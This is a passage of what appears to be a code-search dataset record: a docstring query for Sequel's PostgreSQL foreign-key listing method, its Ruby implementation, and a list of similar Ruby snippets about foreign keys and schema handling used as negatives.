"0.6037891",
"0.5920438",
"0.57999533",
"0.5695673",
"0.5686736",
"0.5677208",
"0.56751347",
"0.56388307",
"0.56238425",
"0.5610893",
"0.5580581",
"0.555721",
"0.55252904",
"0.549507",
"0.54498655",
"0.5410577",
"0.53953636",
"0.5394435",
"0.5376919",
"0.531402",
"0.5286162",
"0.52819204",
"0.52819204",
"0.5273361",
"0.5221611",
"0.5220301",
"0.52132803",
"0.5213014",
"0.5196396",
"0.5196396",
"0.51925683",
"0.5176595",
"0.5175543",
"0.5133974",
"0.51278025",
"0.5108515",
"0.5088684",
"0.506368",
"0.506368",
"0.50549185",
"0.5046434",
"0.50452846",
"0.50421524",
"0.5033331",
"0.50262904",
"0.5004284",
"0.49996296",
"0.49992883",
"0.49984264",
"0.49932984",
"0.49931493",
"0.4987809",
"0.49723774",
"0.49292147",
"0.49284413",
"0.49269363",
"0.492063",
"0.491252",
"0.49028602",
"0.4872222",
"0.48499125",
"0.48385784",
"0.48332793",
"0.48287734",
"0.48287734",
"0.47997507",
"0.47970602",
"0.47859535",
"0.4784325",
"0.4783418",
"0.47729468",
"0.47699612",
"0.47579223",
"0.47573698",
"0.4750096",
"0.4738652",
"0.47194195",
"0.47170275",
"0.47095242",
"0.47093394",
"0.47002184",
"0.4698298",
"0.46951893",
"0.4688789",
"0.46787006",
"0.46787006",
"0.46622545",
"0.4659873",
"0.46566352",
"0.4645769",
"0.46444547",
"0.46303168"
] |
0.7433689
|
2
|
Return full foreign key information using the pg system tables, including :name, :on_delete, :on_update, and :deferrable entries in the hashes. Supports additional options: :reverse :: Instead of returning foreign keys in the current table, return foreign keys in other tables that reference the current table. :schema :: Set to true to have the :table value in the hashes be a qualified identifier. Set to false to use a separate :schema value with the related schema. Defaults to whether the given table argument is a qualified identifier.
|
def foreign_key_list(table, opts=OPTS)
  m = output_identifier_meth
  schema, _ = opts.fetch(:schema, schema_and_table(table))
  h = {}
  fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP
  reverse = opts[:reverse]

  (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|
    if reverse
      # Foreign keys in other tables need schema and table in the key to
      # disambiguate constraints that share a name across tables.
      key = [row[:schema], row[:table], row[:name]]
    else
      key = row[:name]
    end

    if r = h[key]
      # Subsequent rows for a composite foreign key add the remaining columns.
      r[:columns] << m.call(row[:column])
      r[:key] << m.call(row[:refcolumn])
    else
      entry = h[key] = {
        :name=>m.call(row[:name]),
        :columns=>[m.call(row[:column])],
        :key=>[m.call(row[:refcolumn])],
        :on_update=>fklod_map[row[:on_update]],
        :on_delete=>fklod_map[row[:on_delete]],
        :deferrable=>row[:deferrable],
        :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),
      }

      unless schema
        # If not combining schema information into the :table entry,
        # include it as a separate entry.
        entry[:schema] = m.call(row[:schema])
      end
    end
  end

  h.values
end
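
A minimal usage sketch (not part of the dataset row): it assumes a Sequel PostgreSQL connection named DB and hypothetical :items/:invoices tables, and shows how the hashes described in the query above are typically consumed.

require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb') # hypothetical connection string

# Foreign keys defined in :items, one hash per constraint.
DB.foreign_key_list(:items).each do |fk|
  puts "#{fk[:name]}: #{fk[:columns].inspect} -> #{fk[:table]}(#{fk[:key].inspect})"
  puts "  on_update=#{fk[:on_update]} on_delete=#{fk[:on_delete]} deferrable=#{fk[:deferrable]}"
end

# With :reverse, list foreign keys in other tables that reference :invoices.
DB.foreign_key_list(:invoices, reverse: true)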
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def dump_table_foreign_keys(table, options=OPTS)\n if supports_foreign_key_parsing?\n fks = foreign_key_list(table, options).sort_by{|fk| fk[:columns]}\n end\n\n if fks.nil? || fks.empty?\n ''\n else\n dump_add_fk_constraints(table, fks)\n end\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def foreign_keys(table_name, stream)\n if (foreign_keys = @connection.foreign_keys(table_name)).any?\n add_foreign_key_statements = foreign_keys.map do |foreign_key|\n options = foreign_key.options\n table_from_key = foreign_key.to_table\n statement_parts = [ ('add_foreign_key ' + foreign_key.from_table.inspect) ]\n statement_parts << table_from_key.inspect\n statement_parts << (':name => ' + options[:name].inspect)\n\n column_from_options = options[:column]\n primary_key_from_options = options[:primary_key]\n dependent_from_options = options[:dependent]\n\n if column_from_options != \"#{table_from_key.singularize}_id\"\n statement_parts << (\":column => #{column_from_options.inspect}\")\n end\n if primary_key_from_options != 'id'\n statement_parts << (\":primary_key => #{primary_key_from_options.inspect}\")\n end\n if dependent_from_options.present?\n statement_parts << (\":dependent => #{dependent_from_options.inspect}\")\n end\n\n # Always exclude the index\n # If an index was created in a migration, it will get dumped to the schema\n # separately from the foreign key. This will raise an exception if\n # add_foreign_key is run without :exclude_index => true.\n statement_parts << (':exclude_index => true')\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_foreign_key_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def references_with_foreign_key(*args)\n # Don't pop, unlike extract_options!, because we need to leave *args intact.\n options = args.last.is_a?(::Hash) ? args.last : {}\n polymorphic = options.has_key? :polymorphic\n\n references_without_foreign_key *args\n\n # Now we discard any options.\n options = args.extract_options! \n\n unless polymorphic\n args.each do |column|\n @@foreign_keys << [\"#{column}_id\", options]\n end\n end\n end",
"def foreign_key?\n @ref_table ? true : false\n end",
"def import_foreign_keys( table )\n for opts in db.foreign_key_list( table.name )\n opts = opts.dup\n name = opts.delete( :name )\n columns = opts.delete( :columns )\n table_name = opts.delete( :table )\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_foreign_key( columns, table_name, opts )\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_key\n meta(foreign_key: true)\n end",
"def tables_with_referential_integrity\n schemas_and_tables = select_rows <<-SQL.strip_heredoc\n SELECT s.name, o.name\n FROM sys.foreign_keys i\n INNER JOIN sys.objects o ON i.parent_object_id = o.OBJECT_ID\n INNER JOIN sys.schemas s ON o.schema_id = s.schema_id\n SQL\n schemas_and_tables.map do |schema_table|\n schema, table = schema_table\n \"#{SQLServer::Utils.quoted_raw(schema)}.#{SQLServer::Utils.quoted_raw(table)}\"\n end\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def associations_foreigns\n _reflections.map do |_, reflection|\n cols = [reflection.foreign_key]\n cols << reflection.foreign_type if reflection.polymorphic?\n cols\n end.flatten\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def to_dump(opts={})\n dump = (opts[:inline] ? \" t.foreign_key\" : \"add_foreign_key #{table_name.inspect},\")\n dump << \" [#{Array(column_names).collect{ |name| name.inspect }.join(', ')}]\"\n dump << \", #{references_table_name.inspect}, [#{Array(references_column_names).collect{ |name| name.inspect }.join(', ')}]\"\n dump << \", :on_update => #{on_update.inspect}\" if on_update\n dump << \", :on_delete => #{on_delete.inspect}\" if on_delete\n dump << \", :deferrable => #{deferrable.inspect}\" if deferrable\n dump << \", :name => #{name.inspect}\" if name\n dump << \"\\n\"\n dump\n end",
"def to_sql_with_foreign_keys\n from_table = AirBlade::Migrations::SchemaStatements.table_name\n fks = @@foreign_keys.map{ |column, options| foreign_key_constraint from_table, column, options }\n [ to_sql_without_foreign_keys, fks ].reject{ |x| x.blank? }.join ', '\n end",
"def references(*args)\n options = args.extract_options!\n polymorphic = options.delete(:polymorphic)\n\n options[:referenced_table] = options.delete(:table)\n if options[:referenced_table] && polymorphic\n raise ArgumentError, \"not possible to create a foreign key on a polymorphic association\"\n end\n\n args.each do |col|\n column(\"#{col}_id\", :integer, options)\n foreign_key(\"#{col}_id\", options[:referenced_table], 'id') if options[:referenced_table]\n column(\"#{col}_type\", :string, polymorphic.is_a?(Hash) ? polymorphic : options) unless polymorphic.nil?\n end\n end",
"def find_relations\n sql = <<-eos\n SELECT\n tc.constraint_name, tc.table_name, kcu.column_name,\n ccu.table_name AS foreign_table_name,\n ccu.column_name AS foreign_column_name\n FROM\n information_schema.table_constraints AS tc\n JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name\n JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name\n WHERE constraint_type = 'FOREIGN KEY'\n eos\n @relations = @connection.exec(sql).values\n end",
"def hash_fk_model\n foreign_keys = {}\n @model_class.reflect_on_all_associations(:belongs_to).map{ |r|\n foreign_keys[r.association_foreign_key.to_sym] = r.name\n }\n foreign_keys\n end",
"def reverse_foreign_keys\n connection.reverse_foreign_keys(table_name, \"#{name} Reverse Foreign Keys\")\n end",
"def foreign_key_constraint(from_table, from_column, options = {})\n to_table = options[:to_table] || from_column.to_s[/^(.+)_id$/, 1].tableize\n on_delete = case options[:on_delete]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n end\n on_update = case options[:on_update]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n when :restrict; 'restrict'\n end\n cmd = [ \"constraint #{constraint_name from_table, from_column}\",\n \"foreign key (#{from_column})\",\n \"references #{ActiveRecord::Base.connection.quote_table_name to_table}(id)\",\n ]\n cmd << \"on delete #{on_delete}\" if on_delete\n cmd << \"on update #{on_update}\" if on_update\n cmd.join(' ')\n end",
"def foreign_keys\n vals = []\n foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def foreign_key_fields\n keys = []\n database_field_names.each do |param|\n if self.send(param).is_a? ForeignKey\n keys << param\n end\n end\n keys\n end",
"def foreign_key_name(table_name, columns)\n keys = foreign_key_list(table_name).select{|key| key[:columns] == columns}\n raise(Error, \"#{keys.empty? ? 'Missing' : 'Ambiguous'} foreign key for #{columns.inspect}\") unless keys.size == 1\n keys.first[:name]\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments.all.first.to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_type\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = foreign_key_column\n elsif foreign_key_column =~ /(.*?)_type$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_id\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = \"#{Regexp.last_match(1)}_id\"\n end\n\n if foreign_id_column\n index_node = node.arguments.all.last.hash_value('index')\n if index_node.present? && (index_node.to_s != 'false')\n @index_columns[table_name] ||= []\n @index_columns[table_name] << foreign_id_column\n end\n end\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments[1].to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n if @foreign_keys[table_name].delete(\"#{$1}_type\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n elsif foreign_key_column =~ /(.*?)_type$/\n if @foreign_keys[table_name].delete(\"#{$1}_id\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n end\n end",
"def record_foreign_keys(parent_record)\n association_foreign_keys(parent_record)\n end",
"def foreign_key?\n options.fetch(:foreign_key, false)\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def supports_foreign_tables?\n false\n end",
"def supports_foreign_tables?\n false\n end",
"def association_foreign_keys(assoc_record)\n association_foreign_keys_names.map { |name| assoc_record.public_send(name) }\n end",
"def foreign_key\n @foreign_key ||= (@options[:foreign_key] || \"#{@name}_id\").to_s\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def find_table_by_foreign_key(column_name)\n @opts[:foreign_key][:alias].values_at(column_name).first\n end",
"def conventional_foreign_key?\n parent_table == naming_conventions.parent_table_for(foreign_key)\n end",
"def create_table_with_storing_name(table_name, options = {}, &block)\n @@table_name = table_name\n create_table_without_storing_name table_name, options, &block\n AirBlade::Migrations::SchemaDefinitions.foreign_keys = []\n end",
"def belongs_to_with_foreign_key_migrations(*args)\n options = args.extract_options!\n options[:references] = nil if options[:polymorphic]\n belongs_to_without_foreign_key_migrations(*args.push(options))\n end",
"def belongs_to_with_foreign_key_migrations(*args)\n options = args.extract_options!\n options[:references] = nil if options[:polymorphic]\n belongs_to_without_foreign_key_migrations(*args.push(options))\n end",
"def foreign_key\n @foreign_key ||= @options[:foreign_key] ? @options[:foreign_key].to_s :\n default_foreign_key_field\n end",
"def scaf_foreign_keys\n scaf_belongs_tos.collect(&:primary_key_name)\n end",
"def foreign_key\n @resource_options.fetch :foreign_key,\n :\"#{tools.string.singularize association_name}_id\"\n end",
"def to_dump\n opts = {column: self.column}.merge options_for_dump\n dump = \"add_foreign_key #{from_table.inspect}, #{to_table.inspect}, #{opts.to_s.sub(/^{(.*)}$/, '\\1')}\"\n end",
"def referenced_tables(tables)\n result = {}\n tables.each do |table|\n result[table] = []\n self.select_all(\"select reftabname from syscat.references where tabname = '#{table.upcase}'\").each do |row|\n result[table] << row['reftabname'].downcase\n end\n end\n result\n end",
"def supports_deferrable_foreign_key_constraints?\n true\n end",
"def supports_deferrable_foreign_key_constraints?\n true\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def dump_foreign_key_migration(options=OPTS)\n ts = _dump_tables(options)\n <<END_MIG\nSequel.migration do\n change do\n#{ts.map{|t| dump_table_foreign_keys(t)}.reject{|x| x == ''}.join(\"\\n\\n\").gsub(/^/, ' ')}\n end\nend\nEND_MIG\n end",
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def primary_key_and_all_references_to_uuid(table, seed: nil)\n fk_specs = foreign_keys_into(table)\n\n drop_foreign_keys(fk_specs)\n\n primary_key_to_uuid(table, seed: seed)\n\n fk_specs.each do |fk_spec|\n columns_to_uuid fk_spec[:from_table], fk_spec[:column], seed: seed\n end\n\n create_foreign_keys(fk_specs.deep_dup)\n end",
"def parent_table_for(possible_foreign_key)\n pluralize singular_association_name(possible_foreign_key) if possible_foreign_key =~ foreign_key_regex\n end",
"def collect_foreign_key_references(metadata, foreign_keys, row)\n schema = metadata.tableSchema\n\n # Add row as foreignKey source\n Array(schema ? schema.foreignKeys : []).each do |fk|\n colRef = Array(fk['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n (fk[:reference_from] ||= {})[cell_values] ||= row\n end\n\n # Add row as foreignKey dest\n Array(foreign_keys).each do |fk|\n colRef = Array(fk['reference']['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n fk[:reference_to] ||= {}\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n log_error \"Table #{metadata.url} row #{row.number}(src #{row.sourceNumber}): found duplicate foreign key target: #{cell_values.map(&:to_s).inspect}\" if fk[:reference_to][cell_values]\n fk[:reference_to][cell_values] ||= row\n end\n end",
"def references(current_table)\r\n references = []\r\n tables = get_tables\r\n tables.each do |table|\r\n columns = get_column_names(table)\r\n columns.each do |column|\r\n if /[_id]$/.match(column)\r\n references << table if column.split('_id').join == current_table\r\n end\r\n end\r\n end\r\n references\r\n end",
"def foreign_key(*args)\n # get the name\n name = String===args[0] ? args.shift : \"fk_#{@relvar.name}_#{@relvar.foreign_keys.size}\"\n \n # get the attribute => key mapping\n raise \"Invalid foreign key definition #{args.inspect}\" unless \\\n args.size==1 and Hash===args[0] and \\\n args[0].size == 1\n mapping = args[0]\n \n # get the attributes now\n attributes = args[0].keys.flatten.collect{|a| @relvar.attribute(a, true)}\n \n # get the target now\n target = mapping.values[0]\n target = target.primary_key if Relvar === target\n raise \"Invalid foreign key #{name} for #{@relvar.name} (#{target.inspect})\" unless Key===target\n\n @relvar.add_foreign_key(name, attributes, target)\n end",
"def foreign_key?\n true\n end",
"def foreign_key\n association ? association.foreign_key : name\n end",
"def foreign_key_column_name\n @foreign_key_column_name ||= begin\n out = options[:foreign_key]\n\n unless out\n out = \"#{@model_class.name.underscore}_#{association_name}\"\n out = $1 if out =~ %r{/([^/]+)$}i\n out = out + \"_id\"\n end\n\n out = out.to_s if out.kind_of?(Symbol)\n\n out\n end\n end",
"def add_foreign_keys(create_table_cmd, current_table)\r\n foreign_keys = []\r\n puts \"you currently have #{get_tables.length} other table(s)\"\r\n while true\r\n made_reference = true\r\n puts \"these are your current other tables:\"\r\n print_table_names\r\n puts \"what table would you like to refer to?\"\r\n reference_table = get_valid_name\r\n if foreign_keys.include? reference_table\r\n puts \"#{reference_table} is already referenced by this table.\"\r\n made_reference = false\r\n elsif !get_tables.include? reference_table\r\n puts \"that table is not in the list. would you like to create it as a table?\"\r\n if get_response == 'yes'\r\n create_table(reference_table)\r\n 5.times {puts ''}\r\n else\r\n made_reference = false\r\n end\r\n end\r\n if made_reference\r\n puts \"A reference to table '#{reference_table}' has been added.\"\r\n foreign_keys << reference_table\r\n end\r\n puts \"would you like to connect #{current_table} to a different table?\"\r\n break if get_response == 'no'\r\n end\r\n foreign_keys.each {|table_name| create_table_cmd += \", #{table_name}_id INT\"}\r\n foreign_keys.each {|table_name| create_table_cmd += \", FOREIGN KEY (#{table_name}_id) REFERENCES #{table_name}(id)\"}\r\n create_table_cmd\r\n end",
"def supports_foreign_keys?\n false\n end",
"def supports_foreign_keys?\n false\n end",
"def quote_constraint_name(foreign_key)\n quote_table_name(foreign_key)\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def foreign_key_present?\n false\n end",
"def foreign_key_present?\n false\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def scaffold_foreign_key(reflection)\n get_key_array_safe(reflection.child_key).name\n end",
"def relation_foreign_key(relation)\n relation_reflect(relation).foreign_key\n end",
"def sort_dumped_tables(tables, options=OPTS)\n if options[:foreign_keys] != false && supports_foreign_key_parsing?\n table_fks = {}\n tables.each{|t| table_fks[t] = foreign_key_list(t)}\n # Remove self referential foreign keys, not important when sorting.\n table_fks.each{|t, fks| fks.delete_if{|fk| fk[:table] == t}}\n tables, skipped_foreign_keys = sort_dumped_tables_topologically(table_fks, [])\n options[:skipped_foreign_keys] = skipped_foreign_keys\n tables\n else\n tables\n end\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def db_fields_for_table(table_name)\n db_fields = {}\n result = @db.schema(table_name).each do |col|\n db_fields[col[0].to_sym] = col[1]\n end\n\n db_fields\n end",
"def match_foreign_key(column)\n if column.ref_table == @name || foreign_keys.include?(column.name.downcase)\n @name if primary_key\n end\n end",
"def dump( out )\n out << \"foreign_key #{out_columns}, #{out_table_name}#{out_opts}\"\n end",
"def dump_table_generator(table, options=OPTS)\n s = schema(table, options).dup\n pks = s.find_all{|x| x.last[:primary_key] == true}.map(&:first)\n options = options.merge(:single_pk=>true) if pks.length == 1\n m = method(:recreate_column)\n im = method(:index_to_generator_opts)\n\n if options[:indexes] != false && supports_index_parsing?\n indexes = indexes(table).sort\n end\n\n if options[:foreign_keys] != false && supports_foreign_key_parsing?\n fk_list = foreign_key_list(table)\n \n if (sfk = options[:skipped_foreign_keys]) && (sfkt = sfk[table])\n fk_list.delete_if{|fk| sfkt.has_key?(fk[:columns])}\n end\n\n composite_fks, single_fks = fk_list.partition{|h| h[:columns].length > 1}\n fk_hash = {}\n\n single_fks.each do |fk|\n column = fk.delete(:columns).first\n fk.delete(:name)\n fk_hash[column] = fk\n end\n\n s = s.map do |name, info|\n if fk_info = fk_hash[name]\n [name, fk_info.merge(info)]\n else\n [name, info]\n end\n end\n end\n\n create_table_generator do\n s.each{|name, info| m.call(name, info, self, options)}\n primary_key(pks) if !@primary_key && pks.length > 0\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts, options))} if indexes\n composite_fks.each{|fk| send(:foreign_key, fk[:columns], fk)} if composite_fks\n end\n end",
"def _foreign_key_list_ds\n @_foreign_key_list_ds ||= __foreign_key_list_ds(false)\n end",
"def dump_table_schema(table, options={})\n table = table.value.to_s if table.is_a?(SQL::Identifier)\n raise(Error, \"must provide table as a Symbol, String, or Sequel::SQL::Identifier\") unless [String, Symbol].any?{|c| table.is_a?(c)}\n s = schema(table).dup\n pks = s.find_all{|x| x.last[:primary_key] == true}.map{|x| x.first}\n options = options.merge(:single_pk=>true) if pks.length == 1\n m = method(:column_schema_to_generator_opts)\n im = method(:index_to_generator_opts)\n begin\n indexes = indexes(table).sort_by{|k,v| k.to_s} if options[:indexes] != false\n rescue Sequel::NotImplemented\n nil\n end\n gen = Schema::Generator.new(self) do\n s.each{|name, info| send(*m.call(name, info, options))}\n primary_key(pks) if !@primary_key && pks.length > 0\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts))} if indexes\n end\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && indexes && !indexes.empty?}) do\\n#{commands.gsub(/^/o, ' ')}\\nend\"\n end",
"def remove_table_not_exist_foreign_keys\n @foreign_keys.each do |table, foreign_keys|\n foreign_keys.delete_if do |key|\n if key.is_a?(String) && key =~ /_id$/\n class_name = Prepares.model_associations.get_association_class_name(table, key[0..-4])\n class_name ? !@table_nodes[class_name.gsub('::', '').tableize] : !@table_nodes[key[0..-4].pluralize]\n end\n end\n end\n end",
"def foreign_properties\n to_h.slice(*foreign_keys + foreign_objects)\n end",
"def supports_deferrable_foreign_key_constraints?\n supports_deferrable_constraints?\n end",
"def scaf_foreign_key_name( assoc )\n assoc.primary_key_name\n end",
"def _reverse_foreign_key_list_ds\n @_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)\n end",
"def link_belongs_to(reflection)\n reflection.foreign_key.to_sym\n end",
"def constraint_name(table, field)\n \"fk_#{table}_#{field_list_name(field)}\"\n end",
"def foreign_key_name(class_name)\n Inflector.foreign_key(class_name).to_sym\n end",
"def foreign_key?\n false\n end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def belongs_to(table, options = {})\n options = options.merge(:references => table)\n options[:on_delete] = options.delete(:dependent) if options.has_key?(:dependent)\n column(\"#{table.to_s.singularize}_id\".to_sym, :integer, options)\n end",
"def foreign_key?\n index == entity.key_column && !entity.is_core\n end",
"def get_origin_foreign_key\n if @origin_class\n return [@origin_class.revisionary_options[:polymorphic]].map { |p| [ \"#{p}_type\", \"#{p}_id\" ] }.flatten\n foreign_key = self.class.reflect_on_all_associations.find { |a| a.klass == @origin_class }.options[:foreign_key].to_s\n @foreign_key ||= foreign_key.blank? ? [@origin_class.name.downcase + '_id'] : [foreign_key]\n end\n end",
"def check_add_foreign_key(*args)\n options = args.extract_options!\n from_table, to_table = args\n\n validate = options.fetch(:validate, true)\n if postgresql? && validate\n if StrongMigrations.safe_by_default\n safe_add_foreign_key(*args, **options)\n throw :safe\n end\n\n raise_error :add_foreign_key,\n add_foreign_key_code: command_str(\"add_foreign_key\", [from_table, to_table, options.merge(validate: false)]),\n validate_foreign_key_code: command_str(\"validate_foreign_key\", [from_table, to_table])\n end\n end",
"def foreign_key\n association.foreign_key \n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def association_attributes\n outgoing_reflections.values.map { |reflection| reflection.foreign_key.to_s }\n end",
